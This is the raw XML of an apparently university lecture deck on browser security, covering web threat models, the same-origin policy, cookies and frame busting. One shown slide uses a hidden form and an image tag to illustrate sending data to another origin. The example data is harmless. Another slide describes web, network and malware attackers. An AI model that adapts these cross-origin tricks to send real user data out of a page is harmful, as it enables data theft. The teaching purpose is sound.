        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019800" y="2895600"/>
            <a:ext cx="935038" cy="7016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submit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>post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export</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843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ways to send information to other origins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nsolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;form action="http://www.bank.com/"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		&lt;input name="data" type="hidden" value="hello"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	&lt;/form&gt;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nsolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;img src="http://www.b.com/?data=hello"/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>No user involvement required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Cannot read back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95600" y="1976438"/>
            <a:ext cx="3276600" cy="391001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895600" y="3981450"/>
            <a:ext cx="533400" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/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638800" y="1981200"/>
            <a:ext cx="533400" cy="2000250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/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4341" name="Picture 4" descr="http://indarktrees.com/pics/villian%2520copy.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="14191" t="2339" r="11314" b="20322"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162800" y="1905000"/>
            <a:ext cx="17033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Alice _8885 by Disney-Grandpa."/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect l="7903" t="10526" r="9120" b="7895"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="38862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6705600" y="4286250"/>
            <a:ext cx="2276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Web Attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Sets up malicious site visited by victim; no control of network</a:t>
            </a:r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533400" y="626745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4345" name="Right Arrow 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="43434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6" name="Right Arrow 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2057400" y="52578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7" name="Right Arrow 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324600" y="23622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8" name="Right Arrow 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6324600" y="3276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4349" name="Picture 11" descr="CompaqAlphaServerES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28850"/>
            <a:ext cx="1155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Box 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3184525" y="2619375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System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Cloud Callout 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648200" y="3981450"/>
            <a:ext cx="1155700" cy="1276350"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -186846"/>
              <a:gd name="adj2" fmla="val 43949"/>
            </a:avLst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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14352" name="Straight Connector 33"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="30" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4919662" y="3748088"/>
            <a:ext cx="492125" cy="1206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3" name="Straight Connector 35"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4256088" y="4743450"/>
            <a:ext cx="457200" cy="1714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354" name="Picture 18" descr="toshiba_satellite_a105_s4284_lap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252913"/>
            <a:ext cx="14366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Threat Models</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1451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Web attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Control attacker.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can obtain SSL/TLS certificate for attacker.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User visits attacker.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Or: runs attacker’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Passive: Wireless eavesdropper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Active: Evil router, DNS poisoning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malware attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker escapes browser isolation mechanisms and run separately under control of OS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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>
            <a:off x="609600" y="1600200"/>
            <a:ext cx="0" cy="480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5/18/2007" val="LastModified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31329</TotalTime>
  <Words>2580</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>735</Paragraphs>
  <Slides>77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Blueprint</vt:lpstr>
      <vt:lpstr>1_Blueprint</vt:lpstr>
      <vt:lpstr>2_Blueprint</vt:lpstr>
      <vt:lpstr>3_Blueprint</vt:lpstr>
      <vt:lpstr>4_Blueprint</vt:lpstr>
      <vt:lpstr>5_Blueprint</vt:lpstr>
      <vt:lpstr>Image</vt:lpstr>
      <vt:lpstr>Browser Security Model</vt:lpstr>
      <vt:lpstr>Reported Web Vulnerabilities "In the Wild"</vt:lpstr>
      <vt:lpstr>Web application vulnerabilities</vt:lpstr>
      <vt:lpstr>Web programming poll</vt:lpstr>
      <vt:lpstr>Four lectures on Web security</vt:lpstr>
      <vt:lpstr>Goals of web security</vt:lpstr>
      <vt:lpstr>Slide 7</vt:lpstr>
      <vt:lpstr>Slide 8</vt:lpstr>
      <vt:lpstr>Web Threat Models</vt:lpstr>
      <vt:lpstr>Malware attacker</vt:lpstr>
      <vt:lpstr>Announcment</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>HTTP </vt:lpstr>
      <vt:lpstr>URLs</vt:lpstr>
      <vt:lpstr>HTTP Request</vt:lpstr>
      <vt:lpstr>HTTP Response</vt:lpstr>
      <vt:lpstr>Rendering Content</vt:lpstr>
      <vt:lpstr>Rendering and events</vt:lpstr>
      <vt:lpstr>Pages can embed content from many sources</vt:lpstr>
      <vt:lpstr>Document Object Model (DOM)</vt:lpstr>
      <vt:lpstr>HTML Image Tags</vt:lpstr>
      <vt:lpstr>Image tag security issues</vt:lpstr>
      <vt:lpstr>JavaScript onError</vt:lpstr>
      <vt:lpstr>JavaScript timing</vt:lpstr>
      <vt:lpstr>Port scanning behind firewall</vt:lpstr>
      <vt:lpstr>Remote scripting</vt:lpstr>
      <vt:lpstr>Isolation</vt:lpstr>
      <vt:lpstr>Running Remote Code is Risky</vt:lpstr>
      <vt:lpstr>Frame and iFrame</vt:lpstr>
      <vt:lpstr>Windows Interact</vt:lpstr>
      <vt:lpstr>Browser Sandbox</vt:lpstr>
      <vt:lpstr>Analogy</vt:lpstr>
      <vt:lpstr>Policy Goals</vt:lpstr>
      <vt:lpstr>Same Origin Policy</vt:lpstr>
      <vt:lpstr>Library import</vt:lpstr>
      <vt:lpstr>Components of browser security policy</vt:lpstr>
      <vt:lpstr>Domain Relaxation</vt:lpstr>
      <vt:lpstr>Recent Developments</vt:lpstr>
      <vt:lpstr>Communication</vt:lpstr>
      <vt:lpstr>window.postMessage</vt:lpstr>
      <vt:lpstr>postMessage syntax</vt:lpstr>
      <vt:lpstr>Why include “targetOrigin”?</vt:lpstr>
      <vt:lpstr>Navigation</vt:lpstr>
      <vt:lpstr>A Guninski Attack</vt:lpstr>
      <vt:lpstr>What should the policy be?</vt:lpstr>
      <vt:lpstr>Slide 46</vt:lpstr>
      <vt:lpstr>Window Policy Anomaly</vt:lpstr>
      <vt:lpstr>Slide 48</vt:lpstr>
      <vt:lpstr>Slide 49</vt:lpstr>
      <vt:lpstr>Security User Interface</vt:lpstr>
      <vt:lpstr>Safe to type your password?</vt:lpstr>
      <vt:lpstr>Safe to type your password?</vt:lpstr>
      <vt:lpstr>Safe to type your password?</vt:lpstr>
      <vt:lpstr>Safe to type your password?</vt:lpstr>
      <vt:lpstr>Safe to type your password?</vt:lpstr>
      <vt:lpstr>Mixed Content:  HTTP and HTTPS</vt:lpstr>
      <vt:lpstr>Mixed Content:  HTTP and HTTPS</vt:lpstr>
      <vt:lpstr>Mixed content and network attacks</vt:lpstr>
      <vt:lpstr>Lock Icon 2.0</vt:lpstr>
      <vt:lpstr>Finally:   the status Bar</vt:lpstr>
      <vt:lpstr>Cookies:   client state</vt:lpstr>
      <vt:lpstr>Cookies</vt:lpstr>
      <vt:lpstr>Cookie authentication</vt:lpstr>
      <vt:lpstr>Cookie Security Policy</vt:lpstr>
      <vt:lpstr>Secure Cookies</vt:lpstr>
      <vt:lpstr>httpOnly Cookies</vt:lpstr>
      <vt:lpstr>Frames and frame busting</vt:lpstr>
      <vt:lpstr>Frames</vt:lpstr>
      <vt:lpstr>Frame Busting</vt:lpstr>
      <vt:lpstr>Better Frame Busting</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>THE   END</vt:lpstr>
      <vt:lpstr>Network access from  browser sandbox</vt:lpstr>
      <vt:lpstr>Same Origin Requests with XMLHttpRequet</vt:lpstr>
      <vt:lpstr>Sending a Cross-Domain GET</vt:lpstr>
      <vt:lpstr>Sending a Cross-Domain POST</vt:lpstr>
      <vt:lpstr>Data export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subject/>
  <dc:creator>Ante Derek</dc:creator>
  <cp:lastModifiedBy> John Mitchell</cp:lastModifiedBy>
  <cp:revision>6798</cp:revision>
  <cp:lastPrinted>1998-03-10T18:42:22Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">1997-09-07T20:51:32Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-04-22T21:05:03Z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